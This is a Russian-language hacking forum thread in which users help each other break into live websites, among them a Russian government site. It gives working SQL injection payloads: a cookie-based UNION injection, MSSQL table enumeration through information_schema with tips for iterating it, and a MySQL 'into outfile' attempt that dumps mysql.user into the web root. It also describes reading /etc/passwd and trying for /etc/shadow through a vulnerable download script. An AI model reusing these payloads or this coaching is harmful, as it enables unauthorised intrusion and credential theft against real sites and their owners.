.acme
при обращении к скрипту http://www.rosprom.gov.ru/oorg.php
в куки прописывай id=-999 union select 1,2,3,4,5/*

__________________
Карфаген должен быть разрушен...

Indio какая СУБД интересует?
MSSQL: select TOP n column from table where column>'чето'
MYSQL: select column from table limit 20000,10
SYBASE: select TOP n START AT 20000 column from table
PostgreSQL: select column from table LIMIT 10 OFFSET 20000

__________________
Карфаген должен быть разрушен...

Со скулей походу ниче не вышло,аблом =_=

Вот второй день уже маюсь,дошёл вот :

http://robinzonada.ru/news/index.asp?id=1+or+1=(select+top+1+table_name+from+ information_schema.tables+where+table_name+not+in+ (0x276C6F67696E27,0x27647470726F7065727469657327))--

Почему дальше не идёт,не ужели всего две таблицы ?))

меняй число после top во втором подзапросе (который внутри where+table_name+not+in)

__________________
Карфаген должен быть разрушен...

Пасип те большое))).И откуда ты только эти подзапросы откопал:Р

из манов, которые тебе давно пора начать читать

__________________

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Я прочитал почти всё что только можно прочитать: (и маны читал по сто раз

Подскажите кто нибудь:
Система UNIX.
В httpd.conf прописано:
<VirtualHost *>
ServerAdmin webmaster@site.com
DocumentRoot /www/htdocs/rail
ServerName www.site.com
# ServerAlias 10.7.103.250
ServerAlias 10.7.100.4
ErrorLog /var/log/apache/railway.log
CustomLog /var/log/apache/railway.log common
</VirtualHost>

Дальше нужно записать файл в директорию /www/htdocs/rail:
www.site.com/index=4&number=1'+union+select+1,2,3,convert(те� �ст+using+c p1251)+from+mysql.user+into+outfile+"\\www\\htdocs \\rail\\1.txt"/*

Вроде записалось, проверяем:
www.site.com/1.txt и нифига не получилось... Кто скажет почему???

нашел на сатйте бажный скрипт даунлоада фалов
скачал /etc/passwd все прошло норм
поробовал /etc/shadow
а он мне выдает вот эту шянягу http://slil.ru/25750274 что это может быть???